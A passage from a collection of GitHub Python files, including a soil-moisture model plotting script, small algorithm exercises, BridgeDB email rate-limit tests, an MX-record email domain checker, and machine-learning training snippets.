Fwsoil.resample(\"D\").agg('mean')\n Fwsoil.index = Fwsoil.index - pd.datetime(2011,12,31)\n Fwsoil.index = Fwsoil.index.days\n '''\n\n swilt = np.zeros(len(SoilMoist))\n sfc = np.zeros(len(SoilMoist))\n ssat = np.zeros(len(SoilMoist))\n effctv_sat = np.zeros(len(SoilMoist))\n\n if cable_version == \"pore_scale_model\":\n Watr = cable.variables['Watr'][0]\n elif cable_version == \"Mark_latest\":\n Watr = 0.02355\n\n for i in np.arange(len(SoilMoist)):\n\n swilt[i]= cable.variables['swilt'][0]\n sfc[i] = cable.variables['sfc'][0]\n ssat[i] = cable.variables['ssat'][0]\n print(Watr)\n print(swilt[i])\n print(sfc[i])\n print(ssat[i])\n print(SoilMoist.values[i])\n effctv_sat[i] = (SoilMoist.values[i] - Watr)/(ssat[i] - Watr)\n\n# ____________________ Plot obs _______________________\n fig = plt.figure(figsize=[15,10])\n fig.subplots_adjust(hspace=0.1)\n fig.subplots_adjust(wspace=0.05)\n plt.rcParams['text.usetex'] = False\n plt.rcParams['font.family'] = \"sans-serif\"\n plt.rcParams['font.sans-serif'] = \"Helvetica\"\n plt.rcParams['axes.labelsize'] = 14\n plt.rcParams['font.size'] = 14\n plt.rcParams['legend.fontsize'] = 10\n plt.rcParams['xtick.labelsize'] = 14\n plt.rcParams['ytick.labelsize'] = 14\n\n almost_black = '#262626'\n # change the tick colors also to the almost black\n plt.rcParams['ytick.color'] = almost_black\n plt.rcParams['xtick.color'] = almost_black\n\n # change the text colors also to the almost black\n plt.rcParams['text.color'] = almost_black\n\n # Change the default axis colors from black to a slightly lighter black,\n # and a little thinner (0.5 instead of 1)\n plt.rcParams['axes.edgecolor'] = almost_black\n plt.rcParams['axes.labelcolor'] = almost_black\n\n ax1 = fig.add_subplot(311)\n ax2 = fig.add_subplot(312)\n ax3 = fig.add_subplot(313)\n\n width = 1.\n x = SoilMoist.index\n #np.arange(len(Rainf.index))\n #print(x)\n #print(Rainf.values)\n\n ax1.plot(subset.index, subset.values, c=\"green\", lw=1.0, ls=\"-\", label=\"tdr\")\n ax1.plot(x, SoilMoist.values,c=\"orange\", lw=1.0, ls=\"-\", label=\"swc\")\n ax1.plot(x, swilt, c=\"black\", lw=1.0, ls=\"-\", label=\"swilt\")\n ax1.plot(x, sfc, c=\"black\", lw=1.0, ls=\"-.\", label=\"sfc\")\n ax1.plot(x, ssat, c=\"black\", lw=1.0, ls=\":\", label=\"ssat\")\n ax2.plot(x, effctv_sat, c=\"forestgreen\", lw=1.0, ls=\"-\", label=\"Fwsoil\")\n ax3.plot(x, TVeg['TVeg'].rolling(window=7).mean(), c=\"green\", lw=1.0, ls=\"-\", label=\"TVeg\")\n ax3.plot(x, ESoil['ESoil'].rolling(window=7).mean(), c=\"orange\", lw=1.0, ls=\"-\", label=\"ESoil\")\n\n 
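# x axis counts days since 2011-12-31, so each tick below falls on 1 January of the labelled year\n 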
cleaner_dates = [\"2013\",\"2014\",\"2015\",\"2016\",\"2017\",\"2018\",\"2019\"]\n xtickslocs = [367,732,1097,1462,1828,2193,2558]\n\n plt.setp(ax1.get_xticklabels(), visible=False)\n ax1.set(xticks=xtickslocs, xticklabels=cleaner_dates) ####\n ax1.set_ylabel(\"VWC (m3/m3)\")\n ax1.axis('tight')\n ax1.set_ylim(0,0.5)\n ax1.set_xlim(367,2739)\n ax1.legend()\n\n plt.setp(ax2.get_xticklabels(), visible=False)\n ax2.set(xticks=xtickslocs, xticklabels=cleaner_dates) ####\n ax2.set_ylabel(\"Effective Saturation (-)\")\n ax2.axis('tight')\n ax2.set_ylim(0.,1.)\n ax2.set_xlim(367,2739)\n\n #plt.setp(ax3.get_xticklabels(), visible=False)\n ax3.set(xticks=xtickslocs, xticklabels=cleaner_dates) ####\n ax3.set_ylabel(\"TVeg, ESoil (mm/day)\")\n ax3.axis('tight')\n ax3.set_ylim(0.,4.)\n ax3.set_xlim(367,2739)\n ax3.legend()\n fig.savefig(\"EucFACE_tdr_%s_%s.png\" % (case_name, ring), bbox_inches='tight', pad_inches=0.1)\n\nif __name__ == \"__main__\":\n\n layer = \"6\"\n\n cases = [\"or_scheme_test_CABLE-2.2.3_pore_scale_model_dq_dq2_rsv_rBL\"]\n #[\"met_only_or_test_CABLE-2.2.3_pore_scale_model_l_new_roughness_soil-off\"]\n # [\"default-met_only\"]\n cable_version = \"pore_scale_model\"\n # \"Mark_latest\",\"pore_scale_model\"\n\n rings = [\"amb\"] #[\"R1\",\"R2\",\"R3\",\"R4\",\"R5\",\"R6\",\"amb\",\"ele\"]\n for case_name in cases:\n for ring in rings:\n fobs = \"/srv/ccrc/data25/z5218916/cable/EucFACE/Eucface_data/swc_average_above_the_depth/swc_tdr.csv\"\n fcable =\"/srv/ccrc/data25/z5218916/cable/EucFACE/EucFACE_run/outputs/%s/EucFACE_%s_out.nc\" % (case_name, ring)\n main(fobs, fcable, case_name, ring, layer, cable_version)\n","repo_name":"bibivking/EucFACE_run","sub_path":"plots/plot_eucface_swc_cable_vs_obs_tdr_CABLE-2.2.3_pore_scale_model.py","file_name":"plot_eucface_swc_cable_vs_obs_tdr_CABLE-2.2.3_pore_scale_model.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72855997608","text":"class Node:\n def __init__(self,value) -> None:\n self.value=value\n self.next=None\nclass SLL:\n def __init__(self) -> None:\n self.head=None\n self.tail=None\n def __iter__(self)-> None:\n node=self.head\n while node:\n yield node\n node=node.next\n def insertion(self,value,key):\n node=Node(value)\n if self.head==None:\n self.head=node\n self.tail=node\n else:\n if value>=key:\n self.tail.next=node\n self.tail=node\n else:\n node.next=self.head\n self.head=node\nsinglelinkedlist=SLL()\nprint(\"Enter the elements of the linked list\")\nlistele=list(map(int,input().split()))\nkey=int(input(\"Enter the value about which u want to partition the linked list:\"))\nfor ele in listele:\n singlelinkedlist.insertion(ele,key)\nprint([node.value for node in singlelinkedlist])","repo_name":"bharath-reddy07/Data-Structures","sub_path":"Linked_List/Partition_lined_list.py","file_name":"Partition_lined_list.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10083119375","text":"def charToValue(char):\n ascii = ord(char)\n if ascii < 97:\n return ascii - 38\n else:\n return ascii - 96\n\n\nf = open(\"input.txt\", \"r\")\nlines = f.readlines()\n\nvalue = 0\ni = 0\nelves = [\"\"] * 3\n\nfor line in lines:\n elves[i % 3] = line.rstrip('\\n')\n i += 1\n if i % 3 == 0:\n s = str(set(elves[0]) & set(elves[1]) & set(elves[2]))\n value += 
charToValue(s[2])\nprint(value)\n","repo_name":"3rik1sbit/aoc2022","sub_path":"day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16861911240","text":"# program to count the freq of characters in a string\r\ncontent= input(\"enter string : \")\r\ncontent= content.lower()\r\nfor i in range(97,123):\r\n count = 0\r\n j= chr(i)\r\n for l in content:\r\n if j==l :\r\n count = count +1\r\n if count>0:\r\n print(j ,\":\", count)\r\n \r\n\r\n","repo_name":"giridharan1129/python-practice-solutions","sub_path":"string1.py","file_name":"string1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10060811140","text":"# Uses python3\nimport sys\nimport random\n\n\ndef test():\n a = [6, 4, 1, 7, 2, 10]\n expected = sorted(a)\n randomized_quick_sort(a, 0, len(a) - 1)\n print(f'exp: {expected}\\nres: {a}\\n')\n assert a == expected\n\n print('OK')\n\n\ndef partition3_tmp(a, l, r):\n print(f'before: {a} ({l}...{r})')\n x = a[l]\n # j: last 'less than' element\n j = l\n # e: last 'equal' element\n e = l\n # i: last 'greater than' element\n for i in range(l + 1, r + 1):\n if a[i] < x:\n j += 1\n a[i], a[j] = a[j], a[i]\n elif a[i] == x:\n j += 1\n a[i], a[j] = a[j], a[i]\n e += 1\n a[j], a[e] = a[e], a[j]\n\n # a[l], a[j] = a[j], a[l]\n print(f'after: {a} (e: {e} j: {j}) x: {x}')\n return e, j\n\n\ndef partition2(a, l, r):\n x = a[l]\n j = l\n for i in range(l + 1, r + 1):\n if a[i] <= x:\n j += 1\n a[i], a[j] = a[j], a[i]\n a[l], a[j] = a[j], a[l]\n return j\n\n\ndef partition3(a, l, r):\n pivot = a[l]\n # 1st 'equal' element; lt_end+1 is the last elem of 'less than' interval\n lt_end = l\n # last 'equal' element; gt_begin+1 is the first elem of 'greater than' interval\n gt_begin = r\n\n i = l\n while i <= gt_begin:\n if a[i] < pivot:\n a[lt_end], a[i] = a[i], a[lt_end]\n i += 1\n lt_end += 1\n elif a[i] > pivot:\n a[i], a[gt_begin] = a[gt_begin], a[i]\n gt_begin -= 1\n elif a[i] == pivot:\n i += 1\n\n return lt_end, gt_begin\n\n\ndef randomized_quick_sort(a, l, r):\n if l >= r:\n return\n k = random.randint(l, r)\n a[l], a[k] = a[k], a[l]\n lt_end, gt_begin = partition3(a, l, r)\n randomized_quick_sort(a, l, lt_end - 1)\n randomized_quick_sort(a, gt_begin + 1, r)\n\n\ndef main():\n input = sys.stdin.read()\n n, *a = list(map(int, input.split()))\n randomized_quick_sort(a, 0, n - 1)\n for x in a:\n print(x, end=' ')\n\n\nif __name__ == '__main__':\n # test()\n main()","repo_name":"chlos/UCSD-Data-Structures-and-Algorithms","sub_path":"course_01_algorithmic_toolbox/w04/3_improving_quicksort/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27184791577","text":"from __future__ import print_function\n\nimport logging\nimport tempfile\nimport os\n\nfrom twisted.internet.task import Clock\nfrom twisted.trial import unittest\n\nimport bridgedb.Storage\n\nfrom bridgedb.bridges import Bridge\nfrom bridgedb.distributors.email.distributor import EmailDistributor\nfrom bridgedb.distributors.email.distributor import IgnoreEmail\nfrom bridgedb.distributors.email.distributor import TooSoonEmail\nfrom bridgedb.distributors.email.request import EmailBridgeRequest\nfrom bridgedb.parse.addr import BadEmail\nfrom bridgedb.parse.addr import 
UnsupportedDomain\nfrom bridgedb.parse.addr import normalizeEmail\n\nfrom bridgedb.test.util import generateFakeBridges\n\nlogging.disable(50)\n\n\nBRIDGES = generateFakeBridges()\n\n\nclass EmailDistributorTests(unittest.TestCase):\n \"\"\"Tests for :class:`bridgedb.distributors.email.distributor.EmailDistributor`.\"\"\"\n\n # Fail any tests which take longer than 15 seconds.\n timeout = 15\n\n def setUp(self):\n self.fd, self.fname = tempfile.mkstemp(suffix=\".sqlite\", dir=os.getcwd())\n bridgedb.Storage.initializeDBLock()\n self.db = bridgedb.Storage.openDatabase(self.fname)\n bridgedb.Storage.setDBFilename(self.fname)\n\n self.bridges = BRIDGES\n self.key = 'aQpeOFIj8q20s98awfoiq23rpOIjFaqpEWFoij1X'\n self.domainmap = {\n 'example.com': 'example.com',\n 'dkim.example.com': 'dkim.example.com',\n }\n self.domainrules = {\n 'example.com': ['ignore_dots'],\n 'dkim.example.com': ['dkim', 'ignore_dots']\n }\n\n def tearDown(self):\n self.db.close()\n os.close(self.fd)\n os.unlink(self.fname)\n\n def makeClientRequest(self, clientEmailAddress):\n bridgeRequest = EmailBridgeRequest()\n bridgeRequest.client = clientEmailAddress\n bridgeRequest.isValid(True)\n bridgeRequest.generateFilters()\n return bridgeRequest\n\n def test_EmailDistributor_getBridges_default_client(self):\n \"\"\"If EmailBridgeRequest.client was not set, then getBridges() should\n raise a bridgedb.parse.addr.BadEmail exception.\n \"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n # The \"default\" client is literally the string \"default\", see\n # bridgedb.bridgerequest.BridgeRequestBase.\n bridgeRequest = self.makeClientRequest('default')\n\n self.assertRaises(BadEmail, dist.getBridges, bridgeRequest, 1)\n\n def test_EmailDistributor_getBridges_with_whitelist(self):\n \"\"\"If an email address is in the whitelist, it should get a response\n every time it asks (i.e. 
no rate-limiting).\n \"\"\"\n # The whitelist should be in the form {EMAIL: GPG_FINGERPRINT}\n whitelist = {'white@list.ed': '0123456789ABCDEF0123456789ABCDEF01234567'}\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules,\n whitelist=whitelist)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n # A request from a whitelisted address should always get a response.\n bridgeRequest = self.makeClientRequest('white@list.ed')\n for i in range(5):\n bridges = dist.getBridges(bridgeRequest, 1)\n self.assertEqual(len(bridges), 3)\n\n def test_EmailDistributor_getBridges_rate_limit_multiple_clients(self):\n \"\"\"Each client should be rate-limited separately.\"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n bridgeRequest1 = self.makeClientRequest('abc@example.com')\n bridgeRequest2 = self.makeClientRequest('def@example.com')\n bridgeRequest3 = self.makeClientRequest('ghi@example.com')\n\n # The first request from 'abc' should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest1, 1)), 3)\n # The second from 'abc' gets a warning.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest1, 1)\n # The first request from 'def' should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest2, 1)), 3)\n # The third from 'abc' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest1, 1)\n # The second from 'def' gets a warning.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest2, 1)\n # The third from 'def' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest2, 1)\n # The fourth from 'abc' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest1, 1)\n # The first request from 'ghi' should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest3, 1)), 3)\n # The second from 'ghi' gets a warning.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest3, 1)\n # The third from 'ghi' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest3, 1)\n # The fourth from 'ghi' is ignored.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest3, 1)\n\n def test_EmailDistributor_getBridges_rate_limit(self):\n \"\"\"A client's first email should return bridges. The second should\n return a warning, and the third should receive no response.\n \"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n bridgeRequest = self.makeClientRequest('abc@example.com')\n\n # The first request should get a response with bridges.\n bridges = dist.getBridges(bridgeRequest, 1)\n self.assertGreater(len(bridges), 0)\n [self.assertIsInstance(b, Bridge) for b in bridges]\n self.assertEqual(len(bridges), 3)\n\n # The second gets a warning, and the third is ignored.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest, 1)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1)\n\n def test_EmailDistributor_getBridges_rate_limit_expiry(self):\n \"\"\"A client's first email should return bridges. The second should\n return a warning, and the third should receive no response. 
After the\n EmailDistributor.emailRateMax is up, the client should be able to\n receive a response again.\n \"\"\"\n clock = Clock()\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n bridgeRequest = self.makeClientRequest('abc@example.com')\n\n # The first request should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest, 1, clock)), 3)\n # The second gets a warning, and the rest are ignored.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest, 1, clock)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1, clock)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1, clock)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1, clock)\n\n clock.advance(2 * dist.emailRateMax)\n\n # The client should again get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest, 1, clock)), 3)\n\n def test_EmailDistributor_cleanDatabase(self):\n \"\"\"Calling cleanDatabase() should clean up email times in the database, but\n not allow clients who have been recently warned and/or ignored to\n receive a response again until the remainder of their MAX_EMAIL_RATE\n time is up.\n \"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n bridgeRequest = self.makeClientRequest('abc@example.com')\n\n # The first request should get a response with bridges.\n self.assertEqual(len(dist.getBridges(bridgeRequest, 1)), 3)\n # The second gets a warning, and the third is ignored.\n self.assertRaises(TooSoonEmail, dist.getBridges, bridgeRequest, 1)\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1)\n\n dist.cleanDatabase()\n\n # Cleaning the warning email times in the database shouldn't cause\n # 'abc@example.com' to be able to email again, because only the times\n # which aren't older than EMAIL_MAX_RATE should be cleared.\n self.assertRaises(IgnoreEmail, dist.getBridges, bridgeRequest, 1)\n\n def test_EmailDistributor_prepopulateRings(self):\n \"\"\"Calling prepopulateRings() should add two rings to the\n EmailDistributor.hashring.\n \"\"\"\n dist = EmailDistributor(self.key, self.domainmap, self.domainrules)\n\n # There shouldn't be any subrings yet.\n self.assertEqual(len(dist.hashring.filterRings), 0)\n\n dist.prepopulateRings()\n\n # There should now be two subrings, but the subrings should be empty.\n self.assertEqual(len(dist.hashring.filterRings), 2)\n for (filtre, subring) in dist.hashring.filterRings.values():\n self.assertEqual(len(subring), 0)\n\n # The subrings in this Distributor have gross names, because the\n # filter functions (including their addresses in memory!) are used as\n # the subring names. 
In this case, we should have something like:\n #\n # frozenset([<function byIPv4 at 0x...>])\n #\n # and\n #\n # frozenset([<function byIPv6 at 0x...>])\n #\n # So we have to join the strings together and check the whole thing,\n # since we have no other way to use these stupid subring names to\n # index into the dictionary they are stored in, because the memory\n # addresses are unknowable until runtime.\n\n # There should be an IPv4 subring and an IPv6 ring:\n ringnames = dist.hashring.filterRings.keys()\n self.failUnlessIn(\"IPv4\", \"\".join([str(ringname) for ringname in ringnames]))\n self.failUnlessIn(\"IPv6\", \"\".join([str(ringname) for ringname in ringnames]))\n\n [dist.hashring.insert(bridge) for bridge in self.bridges]\n\n # There should still be two subrings.\n self.assertEqual(len(dist.hashring.filterRings), 2)\n for (filtre, subring) in dist.hashring.filterRings.values():\n self.assertGreater(len(subring), 0)\n\n # Ugh, the hashring code is so gross looking.\n subrings = dist.hashring.filterRings\n subring1 = subrings.values()[0][1]\n subring2 = subrings.values()[1][1]\n # Each subring should have roughly the same number of bridges.\n # (Having ±10 bridges in either ring, out of 500 bridges total, shouldn't\n # be too bad.)\n self.assertApproximates(len(subring1), len(subring2), 10)\n\n def test_EmailDistributor_unsupported_domain(self):\n \"\"\"An unsupported domain should raise an UnsupportedDomain exception.\"\"\"\n self.assertRaises(UnsupportedDomain, normalizeEmail,\n 'bad@email.com', self.domainmap, self.domainrules)\n","repo_name":"isislovecruft/bridgedb","sub_path":"bridgedb/test/test_email_distributor.py","file_name":"test_email_distributor.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"39166315197","text":"import ConfigSpace\n\n\ndef get_hyperparameter_search_space_small(seed):\n \"\"\"\n Small version of svm config space, featuring important hyperparameters\n based on https://arxiv.org/abs/1710.04725\n\n Parameters\n ----------\n seed: int\n Random seed that will be used to sample random configurations\n\n Returns\n -------\n 
cs: ConfigSpace.ConfigurationSpace\n The configuration space object\n \"\"\"\n cs = ConfigSpace.ConfigurationSpace('sklearn.svm.SVC', seed)\n\n kernel = ConfigSpace.Constant(name='svc__kernel', value='rbf')\n C = ConfigSpace.UniformFloatHyperparameter(name='svc__C', lower=0.03125, upper=32768, log=True, default_value=1.0)\n gamma = ConfigSpace.UniformFloatHyperparameter(\n name='svc__gamma', lower=3.0517578125e-05, upper=8, log=True, default_value=0.1)\n\n cs.add_hyperparameters([\n kernel,\n C,\n gamma\n ])\n\n return cs\n","repo_name":"janvanrijn/openml-defaults","sub_path":"openmldefaults/config_spaces/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15210576798","text":"import pandas as pd\npd.options.mode.chained_assignment = None # default='warn'\nimport numpy as np\nimport dns.resolver\nimport time\nimport os\n\n\n\n\n\n#current_directory = os.getcwd()\n\n\ndf_domains_list=[]\nbig_df_domains = []\nk=1\n\n\ndef mx_validate(df,email_col_name,csvfile, current_directory):\n global df_domains_list\n global big_df_domains\n global k\n\n final_directory = os.path.join(current_directory, r'mx valid emails')\n if not os.path.exists(final_directory):\n os.makedirs(final_directory)\n\n\n df[['mail', 'domain']] = df[email_col_name].str.split('@', 1, expand=True)\n df = df[~df['domain'].isnull()]\n domains = list(df.domain.unique())\n\n if 'checked_domains.csv' in os.listdir(current_directory):\n big_df_domains = pd.read_csv(current_directory + '/' + 'checked_domains.csv')\n if k ==1:\n df_domains_list.append(big_df_domains)\n checked_domains_list = list(big_df_domains['domain'].unique())\n if 'type' in big_df_domains.columns:\n if 'invalid' in big_df_domains['type'].unique():\n invaid_domains = list(big_df_domains[big_df_domains['type'] == 'invalid']['domain'].unique())\n df = df[~df['domain'].isin(invaid_domains)]\n\n else:\n if len(df_domains_list) >0:\n checked_domains_list = list(big_df_domains['domain'].unique())\n if 'invalid' in big_df_domains['type'].unique():\n invaid_domains = list(big_df_domains[big_df_domains['type'] == 'invalid']['domain'].unique())\n df = df[~df['domain'].isin(invaid_domains)]\n else:\n checked_domains_list = []\n\n\n domains_dict = {}\n invalid_domains_list = []\n\n i = 0\n for domain in domains:\n i = i + 1\n if domain not in checked_domains_list:\n try:\n mxRecords = dns.resolver.resolve(domain, 'MX')\n exchanges = [exchange.to_text().split()[1] for exchange in mxRecords]\n domains_dict[domain] = ['valid', exchanges]\n print(str(len(os.listdir(current_directory)) - k) + ' files remaining')\n s = str(len(os.listdir(current_directory)) - k) + ' files remaining'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n print(domain + ' domain exist')\n s = domain + ' domain exist'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n \n\n except:\n print(str(len(os.listdir(current_directory)) - k) + ' files remaining')\n s = str(len(os.listdir(current_directory)) - k) + ' files remaining'\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n print(domain + ' domain does not exist')\n s = domain + ' domain does not exist'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n domains_dict[domain] = ['invalid',np.nan]\n invalid_domains_list.append(domain)\n\n time.sleep(0.2)\n per = i * 100 / len(domains)\n 
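# progress readout: percentage of this file's unique domains checked so far\n 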
print(str(int(per)) + '%')\n yield str(int(per)) + '%'\n #plainTextEdit_Page6.appendPlainText(str(int(per)) + '%')\n #QApplication.processEvents()\n\n print('===================================================================================')\n yield '==================================================================================='\n #plainTextEdit_Page6.appendPlainText('===================================================================================')\n #QApplication.processEvents()\n\n else:\n print(str(len(os.listdir(current_directory)) - k) + ' files remaining')\n s = str(len(os.listdir(current_directory)) - k) + ' files remaining'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n print(domain + ' domain had been checked before')\n s = domain + ' domain had been checked before'\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n per = i * 100 / len(domains)\n print(str(int(per)) + '%')\n yield str(int(per)) + '%'\n #plainTextEdit_Page6.appendPlainText(str(int(per)) + '%')\n #QApplication.processEvents()\n\n print('===================================================================================')\n yield '==================================================================================='\n #plainTextEdit_Page6.appendPlainText('===================================================================================')\n #QApplication.processEvents()\n\n df = df[~df['domain'].isin(invalid_domains_list)]\n df = df.drop(columns=['mail', 'domain'])\n\n df.to_csv(final_directory + '/' + csvfile, encoding=\"ISO-8859-1\", index=None, header=True)\n\n df_domains = pd.DataFrame.from_dict(domains_dict, orient='index').reset_index().rename(columns={'index': 'domain', 0: 'type', 1: 'mx records'})\n\n df_domains_list.append(df_domains)\n big_df_domains = pd.concat(df_domains_list)\n big_df_domains.to_csv(current_directory + '/' +'checked_domains.csv', index=None, header=True)\n\n\n #save valid and invalid domains in separate files\n big_df_domains_valid = big_df_domains.copy()\n big_df_domains_invalid = big_df_domains.copy()\n \n big_df_domains_valid = big_df_domains_valid.drop('mx records', axis=1)\n big_df_domains_invalid = big_df_domains_invalid.drop('mx records', axis=1)\n\n\n big_df_domains_valid = big_df_domains_valid[big_df_domains_valid['type'].isin(['valid'])]\n big_df_domains_invalid = big_df_domains_invalid[big_df_domains_invalid['type'].isin(['invalid'])]\n\n\n big_df_domains_valid.to_csv(current_directory + '/' +'checked_domains_valid.csv', index=None, header=True)\n big_df_domains_invalid.to_csv(current_directory + '/' +'checked_domains_invalid.csv', index=None, header=True)\n\n \n k = k + 1\n\n\n\n\n\ndef DirctoryPathToValidation(current_directory):\n j=1\n \n for csvfile in os.listdir(current_directory):\n if csvfile.endswith(\".csv\") and not csvfile == 'checked_domains.csv':\n start_time = time.time()\n print('loading ' + csvfile + ' file: ' + str(j))\n s = 'loading ' + csvfile + ' file: ' + str(j)\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n try:\n df = pd.read_csv(current_directory + '/' + csvfile, encoding=\"ISO-8859-1\", error_bad_lines=False,dtype=str)\n except:\n print('problem reading ' + csvfile)\n s = 'problem reading ' + csvfile\n yield s\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()\n\n if 'EMAIL' in df.columns:\n email_col_name = 'EMAIL'\n df = df[df['EMAIL'].notna()].reset_index(drop=True)\n df = 
df[~df['EMAIL'].isnull()]\n print('MX filtering....')\n val = mx_validate(df,email_col_name,csvfile,current_directory)\n for value in val:\n yield value\n elif 'Email' in df.columns:\n email_col_name = 'Email'\n df = df[df['Email'].notna()].reset_index(drop=True)\n df = df[~df['Email'].isnull()]\n print('MX filtering....')\n val = mx_validate(df,email_col_name,csvfile,current_directory)\n for value in val:\n yield value\n\n j = j + 1\n\n #print(\"--- %s minutes ---\" % ((time.time() - start_time)))\n #s = \"--- %s minutes ---\" % ((time.time() - start_time))\n #plainTextEdit_Page6.appendPlainText(s)\n #QApplication.processEvents()","repo_name":"eslamdyab21/Apara-Data-GUI","sub_path":"scripts/MX_Domain_Validator.py","file_name":"MX_Domain_Validator.py","file_ext":"py","file_size_in_byte":8166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5982604359","text":"from model.data_utils import CoNLLDataset\nfrom model.ner_model import NERModel\nfrom model.config import Config\n\n\ndef main():\n # create instance of config\n config = Config()\n\n # build model\n model = NERModel(config)\n model.build()\n # model.restore_session(\"results/crf/model.weights/\") # optional, restore weights\n # model.reinitialize_weights(\"proj\")\n\n # create datasets\n dev = CoNLLDataset(config.filename_dev, config.processing_word,\n config.processing_tag, config.max_iter)\n train = CoNLLDataset(config.filename_train, config.processing_word,\n config.processing_tag, config.max_iter)\n\n # train model\n model.train(train, dev)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"guillaumegenthial/sequence_tagging","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":1935,"dataset":"github-code","pt":"53"}
{"seq_id":"7529486235","text":"from rest_framework_simplejwt.serializers import TokenObtainPairSerializer\n\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n\n def validate(self, attrs):\n print(attrs)\n data = super().validate(attrs)\n refresh = self.get_token(self.user)\n data['refresh'] = str(refresh)\n data['token'] = str(refresh.access_token)\n data['id'] = self.user.id\n data['username'] = self.user.username\n return {\"data\": data}\n\n","repo_name":"xupengxunil/ops-api","sub_path":"apps/simplejwt/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"40823495074","text":"from sklearn.cluster import KMeans\nfrom sklearn.datasets import make_blobs\nimport matplotlib.pyplot as plt\n\nfrom sklearn_evaluation import plot\n\nX, y = make_blobs(\n n_samples=500,\n n_features=2,\n centers=4,\n cluster_std=1,\n center_box=(-10.0, 10.0),\n shuffle=True,\n random_state=1,\n)\n\nkmeans = KMeans(random_state=1, n_init=5)\nplot.silhouette_analysis(X, kmeans, range_n_clusters=[3])\nplt.show()\n","repo_name":"edublancas/sklearn-evaluation","sub_path":"examples/silhouette_plot_basic.py","file_name":"silhouette_plot_basic.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
{"seq_id":"20522081262","text":"\"\"\"\nAdd contact trackers to Solution Information for all nonlinear contacts\n=======================================================================\n\"\"\"\n\nmodel = ExtAPI.DataModel.Project.Model\nanalysis = 
